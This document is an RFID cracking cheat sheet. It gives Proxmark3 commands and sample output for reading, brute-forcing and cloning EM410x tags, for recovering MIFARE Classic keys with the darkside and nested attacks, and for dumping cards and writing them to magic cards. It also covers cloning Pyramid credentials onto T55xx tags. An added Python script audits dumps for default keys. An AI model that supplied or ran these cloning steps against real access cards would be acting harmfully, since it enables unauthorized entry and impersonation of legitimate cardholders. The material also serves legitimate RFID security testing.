# RFID cracking


EM

# Cloning EM410x
proxmark3> lf read
proxmark3> data samples 30000
proxmark3> lf em4x em410xread
EM TAG ID      : 0DEADBEEF0
proxmark3> lf em4x em410xsim 0DEADBEEF0
proxmark3> lf em4x em410xwrite 0DEADBEEF0 1

# Bruteforcing UID - https://github.com/mtongsang/pm3Bruter
$ ./proxmark3 /dev/cu.usbmodem1411 -b -m 3 -c 256 -t 1122334455

Mifare classic 1k

# Key A for sector 0
proxmark3> hf mf mifare
Found valid key: a0a1a2a3a4a

# Keys A/B for all sectors
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d

# Dumping and reading stored data
proxmark3> hf mf dump
proxmark3> script run htmldump
$ xxd dumpkeys.bin
$ xxd dumpdata.bin
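
What the `xxd dumpdata.bin` output above contains, as an added Python example that is not part of the original cheat sheet: it checks a 1K dump's block 0 BCC, each sector trailer's access-bit encoding, and whether either key is a widely published default. It assumes the dump is the plain 1024-byte card image with keys present in the sector trailers; the key list and the sample image are constructed here.

```python
# Added example: audit a MIFARE Classic 1K dump image (1024 bytes).
# Assumed layout: 16 sectors x 4 blocks x 16 bytes; the last block of each
# sector is the trailer = key A (6) | access bits (3) | GPB (1) | key B (6).
WELL_KNOWN = {bytes.fromhex(k) for k in
              ("ffffffffffff", "a0a1a2a3a4a5", "000000000000")}

def access_bits_valid(ac: bytes) -> bool:
    """Each condition nibble (C1..C3) is stored once plain and once inverted."""
    c1, c2, c3 = ac[1] >> 4, ac[2] & 0x0F, ac[2] >> 4
    n1, n2, n3 = ac[0] & 0x0F, ac[0] >> 4, ac[1] & 0x0F
    return (c1 ^ n1, c2 ^ n2, c3 ^ n3) == (0xF, 0xF, 0xF)

def audit_dump(image: bytes) -> list[str]:
    if len(image) != 1024:
        raise ValueError("expected a 1024-byte 1K image")
    findings = []
    uid, bcc = image[0:4], image[4]
    if uid[0] ^ uid[1] ^ uid[2] ^ uid[3] != bcc:
        findings.append("block 0: BCC does not match UID")
    for sector in range(16):
        trailer = image[sector * 64 + 48: sector * 64 + 64]
        key_a, ac, key_b = trailer[:6], trailer[6:9], trailer[10:]
        for name, key in (("A", key_a), ("B", key_b)):
            if key in WELL_KNOWN:
                findings.append(
                    f"sector {sector}: key {name} is well-known ({key.hex()})")
        if not access_bits_valid(ac):
            findings.append(f"sector {sector}: access bits fail inversion check")
    return findings

def sample_image() -> bytes:
    """Constructed test image, not data from a real card."""
    strong = bytes.fromhex("1f2e3d4c5b6a")           # made-up non-default key
    trailer = strong + bytes.fromhex("ff078069") + strong
    img = bytearray((bytes(48) + trailer) * 16)
    img[0:5] = bytes.fromhex("11223344") + bytes([0x11 ^ 0x22 ^ 0x33 ^ 0x44])
    img[48:54] = bytes.fromhex("a0a1a2a3a4a5")       # sector 0 key A left at a default
    img[5 * 64 + 54] = 0x00                          # corrupt sector 5 access bits
    return bytes(img)

if __name__ == "__main__":
    for line in audit_dump(sample_image()):
        print(line)
```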

# Reading and writing blocks and sectors
proxmark3> hf mf rdbl 0 A a0a1a2a3a4a5
proxmark3> hf mf rdsc 0 A a0a1a2a3a4a5
proxmark3> hf mf wrbl 0 A a0a1a2a3a4a5 0300e5c81c0eec00000000004d494300

# Cloning a dumped tag (dumpdata.bin) using a magic Chinese card
proxmark3> hf mf csetuid 86bcfe41
proxmark3> hf mf restore

# Simulating a tag
proxmark3> hf 14a reader
 UID : 11 22 33 44
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proxmark3> hf 14a sim 1 11223344

Pyramid

# Cloning: read raw data
proxmark3> lf search
Pyramid ID Found - BitLength: 90 -unknown BitLength- (ABCDE), Raw: 11111111222222223333333344444444
Checksum XX passed
Valid Pyramid ID Found!

# Cloning: write raw data
proxmark3> lf t55xx write b 0 d 00107080
Writing page 0  block: 00  data: 0x00107080
proxmark3> lf t55xx write b 1 d 11111111
Writing page 0  block: 01  data: 0x11111111
proxmark3> lf t55xx write b 2 d 22222222
Writing page 0  block: 02  data: 0x22222222
proxmark3> lf t55xx write b 3 d 33333333
Writing page 0  block: 03  data: 0x33333333
proxmark3> lf t55xx write b 4 d 44444444
Writing page 0  block: 04  data: 0x44444444
